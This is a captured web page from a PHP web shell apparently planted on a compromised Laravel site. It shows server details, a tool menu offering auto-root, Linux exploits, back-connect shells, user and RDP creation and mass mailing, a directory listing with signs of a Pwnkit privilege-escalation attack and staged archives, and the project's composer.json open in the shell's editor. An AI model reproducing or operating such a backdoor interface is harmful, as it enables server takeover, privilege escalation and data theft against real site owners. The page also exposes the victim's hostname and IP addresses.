Linux srv1.sbit.com.bd 5.14.0-503.21.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Sun Jan 12 09:45:05 EST 2025 x86_64
Apache
: 192.99.39.68 | : 216.73.216.165
Cant Read [ /etc/named.conf ]
8.2.29
gzmcfenigov
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
gzmcfenigov /
public_html /
[ HOME SHELL ]
Name
Size
Permission
Action
.pkexec
[ DIR ]
drwxr-xr-x
.well-known
[ DIR ]
drwxr-xr-x
GCONV_PATH=.
[ DIR ]
drwxr-xr-x
app
[ DIR ]
drwxrwxrwx
bootstrap
[ DIR ]
drwxrwxrwx
cgi-bin
[ DIR ]
drwxrwxrwx
config
[ DIR ]
drwxrwxrwx
data
[ DIR ]
drwxrwxrwx
database
[ DIR ]
drwxrwxrwx
docker
[ DIR ]
drwxrwxrwx
lang
[ DIR ]
drwxrwxrwx
public
[ DIR ]
drwxr-xr-x
resources
[ DIR ]
drwxrwxrwx
routes
[ DIR ]
drwxrwxrwx
storage
[ DIR ]
drwxrwxrwx
tests
[ DIR ]
drwxrwxrwx
vendor
[ DIR ]
drwxrwxrwx
.cpanel.yml
105
B
-rw-rw-rw-
.editorconfig
258
B
-rw-rw-rw-
.env
1.81
KB
-rw-rw-rw-
.env-example
1.73
KB
-rw-rw-rw-
.gitattributes
186
B
-rw-rw-rw-
.gitignore
1009
B
-rw-rw-rw-
.htaccess
837
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
README.md
11
B
-rw-rw-rw-
app.zip
59.45
MB
-rw-r--r--
artisan
1.65
KB
-rw-rw-rw-
composer.json
2.55
KB
-rw-rw-rw-
composer.lock
384.44
KB
-rw-rw-rw-
error_log
252
B
-rw-r--r--
gzmc.zip
283.24
MB
-rw-r--r--
package-lock.json
24.47
KB
-rw-rw-rw-
package.json
321
B
-rw-rw-rw-
phpunit.xml
1.12
KB
-rw-rw-rw-
pwnkit
10.99
KB
-rwxr-xr-x
sail
16.89
KB
-rw-rw-rw-
vite.config.js
312
B
-rw-rw-rw-
Delete
Unzip
Zip
${this.title}
Close
Code Editor : composer.json
{ "name": "laravel/laravel", "type": "project", "description": "The Laravel Framework.", "keywords": ["framework", "laravel"], "license": "MIT", "require": { "php": "^7.4|^8.1", "barryvdh/laravel-dompdf": "^2.0", "brian2694/laravel-toastr": "^5.57", "guzzlehttp/guzzle": "^7.2", "laravel/framework": "^10.0", "laravel/sanctum": "^3.2", "laravel/tinker": "^2.8", "laravel/ui": "^4.2", "laravelcollective/html": "^6.4", "maatwebsite/excel": "^3.1", "realrashid/sweet-alert": "^7.0", "simplesoftwareio/simple-qrcode": "^4.2", "spatie/laravel-activitylog": "^4.7", "spatie/laravel-backup": "^8.3", "spatie/laravel-permission": "^5.9", "staudenmeir/laravel-adjacency-list": "^1.13", "yajra/laravel-datatables-oracle": "^10.0" }, "require-dev": { "barryvdh/laravel-debugbar": "^3.8", "fakerphp/faker": "^1.9.1", "laravel/pint": "^1.0", "laravel/sail": "^1.18", "mockery/mockery": "^1.4.4", "nunomaduro/collision": "^7.0", "orangehill/iseed": "dev-master", "phpunit/phpunit": "^10.0", "spatie/laravel-ignition": "^2.0" }, "autoload": { "psr-4": { "App\\": "app/", "Database\\Factories\\": "database/factories/", "Database\\Seeders\\": "database/seeders/" } }, "autoload-dev": { "psr-4": { "Tests\\": "tests/" } }, "scripts": { "post-autoload-dump": [ "Illuminate\\Foundation\\ComposerScripts::postAutoloadDump", "@php artisan package:discover --ansi" ], "post-update-cmd": [ "@php artisan vendor:publish --tag=laravel-assets --ansi --force" ], "post-root-package-install": [ "@php -r \"file_exists('.env') || copy('.env.example', '.env');\"" ], "post-create-project-cmd": [ "@php artisan key:generate --ansi" ] }, "extra": { "laravel": { "dont-discover": [] } }, "config": { "optimize-autoloader": true, "preferred-install": "dist", "sort-packages": true, "allow-plugins": { "pestphp/pest-plugin": true, "php-http/discovery": true } }, "repositories": [ { "type": "vcs", "url": "https://github.com/robertmarney/iseed/" } ], "minimum-stability": "stable", "prefer-stable": true }
Close